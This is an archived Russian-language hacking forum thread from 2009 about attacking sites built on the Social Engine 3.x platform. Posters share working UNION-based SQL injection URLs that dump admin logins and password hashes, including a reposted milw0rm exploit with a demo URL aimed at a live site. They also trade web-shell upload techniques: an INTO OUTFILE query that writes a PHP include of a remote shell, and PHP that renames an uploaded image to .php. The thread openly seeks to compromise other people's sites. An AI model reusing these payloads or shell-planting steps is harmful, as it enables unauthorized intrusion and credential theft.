Просмотр полной версии : Social Engine SQL инекция !
eworld.uz
18.01.2009, 16:52
В движке Social Engine версия 3.хх на плагине Сlassified есть SQL инекция ! ;)
Вот sql инекция :
http://sitename.ru/browse_classifieds.php?s=classified_date DESC&v=0&classifiedcat_id=-1+UNION SELECT concat(admin_username,admin_email,0x3a,admin_passw ord)
,2,3+from+se_admins
Как залить шелл ? Помогите друзья !
Вот это скрин таблицы se_admins
http://s49.radikal.ru/i126/0901/1e/7b32166943f3.jpg (http://www.radikal.ru)
CHMOD 777 стоит в папках http://sitename.ru/uploads_user
и на http://sitename.ru/include/smarty/templates_c
Помогите друзья залить ШЕЛЛ кто сможет залить шелл стучите плиз на аску 405-801-351 в долгу не останусь :cool:
и чё с этой скуль иньекцией мона сделать? ты не разяснил, многим не понятно.
получить хэши, расшифровать их и зайти в админку.
а по заливке шелла так никто и не подскажет?
версия мускула какая
5.0.51a
/phpMyAdmin => INTO OUTFILE ? (заливка шела в phpmyadmin ищи на форуме более кокретные примеры если требуется. ни раз поднимался вопрос)
https://forum.antichat.ru/threadnav43966-1-10.html
вот здесь почитай про заливку шела
select '<? @include("http://shell.ru/shell.txt"); ?>' into outfile '/home/blalblalba//uploads_user/shell.php';
File_priv положение вкл
phpmyadmin есть у автора темы.
у меня по его sql-inj есть только доступы к админкам.
где он взял данные по доступу к базе и phpmyadmin я не знаю.
например админка такого сайта:
<вырезано>
как можно туда залить шелл?
читай тему что я показал. а админку и пароль лучше убери, засерут
eworld.uz
21.01.2009, 15:34
У меня просто есть этот двиг вот и показал вам пример таблицы на phpmyadmin сегодня буду пробовать все что посоветовали ! Ели что стукните мне в аску есть хорошый сайт на этот двиг надо залить шелл )
eworld.uz
21.01.2009, 16:02
Друзья прочитал все темы но так и не смог залит шелл ( Помогите
Присоединяюсь, тоже не смог залить.
По ссылке от NFM всё прочитал, пробовал - не получилось.
В дирректорию /uploads_user/ заливал картинки - 1.jpg с шеллом,
2.jpg:
<?php
system("mv /var/www/admin/data/www/domen.com/uploads_user/1000/2/1.jpg /var/www/admin/data/www/domen.com/uploads_user/1000/2/1.php");
die();
?>
но include через SQL не получается.
xcedz, через шаблоны тоже не работает - там даже в шапке редактора написано, что PHP отделён от шаблонов.
eworld.uz
22.01.2009, 11:29
Krobol Какие успехи ?
https://forum.antichat.ru/thread50669.html
гляньте диры пхпмай админа, на всякий случай. =)
browse_classifieds.php?s=classified_date%20DESC&v=0&classifiedcat_id=-1+UNION+SELECT+concat(admin_username,admin_email,0 x3a,admin_password),2,3+from+se_admins
поставил такой запрос но не работает как вывести хеш и логин админа
стукните в аську додумаем вместе как залить шел 858759
eworld.uz, у меня пока ничего не получилось
heks, не на всех сайтах работает
eworld.uz
22.01.2009, 18:40
Думаю работает только для версии 3.10
Думаю работает только для версии 3.10
не только все зависит от самого плагина
сайт с такой уязвимостью я нашел sql видно хеш и пароль получить не могу
может пробел стоит в слове password?
в начале сам чет не заметил
нет пробела в адресе не было эту фишку античата я знаю
блоги
================================================== ================================================== ==============
= SSSSS NN N AA K K EEEEE SSSSS TTTTTTTTT EEEEE AA MM MM =
= S N N N A A K K E S T E A A M M M M =
+ SSSSS N N N AAAAAA KKK EEEEE SSSSS T EEEEE AAAAAA M M M M +
= S N N N A A K K E S T E A A M M M =
= SSSSS N NN A A K K EEEEE SSSSS T EEEEE A A M M =
================================================== =SNAKES TEAM============================================== ======
+ =
= Social Engine (blog.php) SQL Injection Vulnerability +
+ =
==============================================:::A LGERIAN HaCkEr:::========================================= ======
= = = =
= = Discovered By: Snakespc :::ALGERIAN HaCkEr::: = =
= =
:::::Mail: snakespc@gmail.com:::::::
= =
= http://www.socialengine.net/demos.php "blog.php" =
===================================GAZA=========== ==================================
Exploit:
http://localhost/blog.php?user=darkthronex&category_id=-5+UNION SELECT 1,2,3,4,5,concat(admin_username,0x3a,admin_passwor d),7,8,9,10,11,12,13,14,15,16,17,18+from+se_admins/*
********
demo:
http://www.socialenginedev.com/blog.php?user=darkthronex&category_id=-5+UNION SELECT 1,2,3,4,5,concat(admin_username,0x3a,admin_passwor d),7,8,9,10,11,12,13,14,15,16,17,18+from+se_admins/*
================================================== ============ ALLAH AKBAR============================================= ============
Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::His0k4:::H oussamix:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALMADJHOOL:::Th3 g0bL!N::: SuB-ZeRo
ALL www.SnakespC.com/sc >>>>dz-security.net >>>> Members
Str0ke ....Milw0rm
================================================== ===GAZA=========================================== ==============================
# milw0rm.com [2009-01-28]
сайт с такой уязвимостью я нашел sql видно хеш и пароль получить не могу
сейчас такая же проблема
The used SELECT statements have a different number of columns SQL was: SELECT NULL FROM se_blogentries WHERE blogentry_user_id='965' AND (blogentry_privacy & '8') && blogentry_blogentrycat_id=-21 UNION SELECT 1,2,3,4,5,concat(admin_username,0x3a,admin_passwor d),7,8,9,10,11,12,13,14,15,16,17,18 from se_admins/*
mailbrush
01.02.2009, 17:56
сейчас такая же проблема
Берем дружно книжечку по англ. языку и переводим:
The used SELECT statements have a different number of columns
Это значит
Используемая SELECT имеет иное кол-во столбцов
mailbrush
да я понял,
подобрать так и не получилось
LordNikon
22.02.2009, 02:49
Ребят я в админке, кто нибудь решил проблему с заливкой шелла?
И еще вопрос, кто знает какие способы заливки шелов, через картинки, через урлы или еще как. Или ткните меня пожалуйста носом где говорится об этом.
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot